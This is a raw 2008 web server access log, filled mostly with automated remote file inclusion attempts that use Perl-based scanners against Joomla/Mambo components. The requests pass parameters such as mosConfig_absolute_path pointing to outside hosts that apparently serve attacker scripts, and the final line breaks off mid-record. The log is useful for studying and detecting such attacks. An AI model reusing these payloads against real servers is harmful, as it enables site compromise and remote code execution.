72.30.216.95 - - [23/Mar/2008:20:44:29 -0700] "GET /logs/access_log.20080113 HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.36.208.178 - - [23/Mar/2008:20:45:28 -0700] "GET /logs/access_log.20080120/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:28 -0700] "GET /logs/access_log.20080120/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:28 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:28 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:28 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:28 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:49 -0700] "GET /logs/access_log.20080127/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:20:45:58 -0700] "GET /?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 200 698 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:45:58 -0700] "GET /logs/access_log.20080127/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:20:46:11 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
74.52.2.130 - - [23/Mar/2008:20:46:23 -0700] "GET /logs/access_log.20080203/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 240 "-" "libwww-perl/5.808"
74.52.2.130 - - [23/Mar/2008:20:46:23 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
74.52.2.130 - - [23/Mar/2008:20:46:24 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:20:46:45 -0700] "GET /logs/error_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
66.7.207.104 - - [23/Mar/2008:20:47:06 -0700] "GET /logs/error_log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:20:47:24 -0700] "GET /?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.808"
58.65.239.170 - - [23/Mar/2008:20:47:37 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 884736 "-" "-"
66.7.207.104 - - [23/Mar/2008:20:47:39 -0700] "GET /logs/access_log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.808"
72.10.47.53 - - [23/Mar/2008:20:47:57 -0700] "GET /logs/access_log.20080210/index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
72.10.47.53 - - [23/Mar/2008:20:47:57 -0700] "GET /index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
72.10.47.53 - - [23/Mar/2008:20:47:57 -0700] "GET /logs/index.php?pagina=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:48:44 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:20:48:45 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.65"
72.36.208.178 - - [23/Mar/2008:20:51:19 -0700] "GET /logs/access_log.20080120/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 272 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:51:19 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/temp0r/prodiscminidvdriw01.jpg???????? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
72.36.208.178 - - [23/Mar/2008:20:51:19 -0700] "GET /logs/access_log.20080120/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1"